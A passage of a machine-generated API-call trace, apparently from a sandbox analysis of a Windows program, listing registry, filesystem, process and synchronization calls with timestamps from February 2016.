"timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,303", "api": "RegCloseKey"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenMutant"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenMutant"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,303", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,303", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,303", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,303", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenMutant"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenMutant"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:41:35,313", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegEnumKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegEnumKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegEnumKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,313", "api": "NtQueryInformationFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,313", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,323", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": 